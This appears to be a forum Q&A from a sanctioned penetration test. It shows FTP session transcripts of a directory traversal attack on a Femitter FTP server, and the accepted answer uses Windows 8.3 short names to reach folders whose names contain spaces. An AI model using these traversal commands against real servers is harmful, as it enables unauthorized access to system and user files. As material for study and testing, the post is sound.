FTP directory traversal attack on directories containing white spaces
I am conducting a sanctioned pentest in a closed reference environment, and struggled upon a seemingly simple issue, I currently cannot solve.
When attempting to execute a directory traversal attack against a vulnerable Fermitter FTP server running on MS Windows OS, it is possible to do a LIST on system root (addresses and content listings changed here for reference only):
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root):
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 0 Sep 23 2015 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 0 Sep 23 2015 CONFIG.SYS
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 Documents and Settings
dr--r--r-- 1 ftp ftp 0 Sep 23 2015 Program Files
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 WINDOWS
226 File sent ok
However, if I want to list the contents of a folder containing white spaces such as Documents and settings
, I am not able to list the directory contents because of whites spaces being ignored.
ftp> ls ../../../../documents and settings/
usage: ls remote-directory local-file
ftp> ls ../../../../documents\ and\ settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls ../../../../documents%20and%20settings
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents%20and%20settings not found
226 File sent ok
ftp> ls ../../../../'documents and settings'/
usage: ls remote-directory local-file
ftp> ls ../../../../"documents and settings"/
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
ftp> ls "../../../../documents and settings/"
200 Port command successful.
150 Opening data connection for directory list.
/C:/Program Files/Femitter/Shared/../../../../documents not found
226 File sent ok
I already tried using different FTP clients (CLI and GUI, on Linux and Windows) and either they ignore white spaces or disallow directory traversal.
Also tried scripting the attack on Python by using at first raw sockets and then ftplib to send the commands in HEX format directly to the FTP server, but with no success.
Googling for couple of hours did not yield a working solution (yes, there were a lot of options, which did not work), that is why there is someone here, who has had the same issue. Pretty sure, that this is not the first time such a directory traversal with white spaces is needed.
Solution suggested by @Dogeatcatworld to use MS Windows directory short notation such as C:\Docume~1\
.
ftp> ls ../../../../Docume~1/
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 .
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 ..
drw-rw-rw- 1 ftp ftp 0 Sep 26 2015 Administrateur
drw-rw-rw- 1 ftp ftp 0 Sep 23 2015 All Users
226 File sent ok
Really good article from MS Knowledge Base explains the 8.3 directory notation: How Windows Generates 8.3 File Names from Long File Names
The "short name" is really the old DOS 8.3 naming convention, so all the directories will be the first 6 letters followed by ~1 assuming there is only one name that matches, for example:
C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\BCDEFG~1 - C:\BCDEFGHIJKL M Another DirectoryHere is the only exception:
C:\ABCDEF~1 - C:\ABCDEFG I AM DIRECTORY
C:\ABCDEF~2 - C:\ABCDEFGHI Directory as well
Source: How can I find the short path of a Windows directory/file?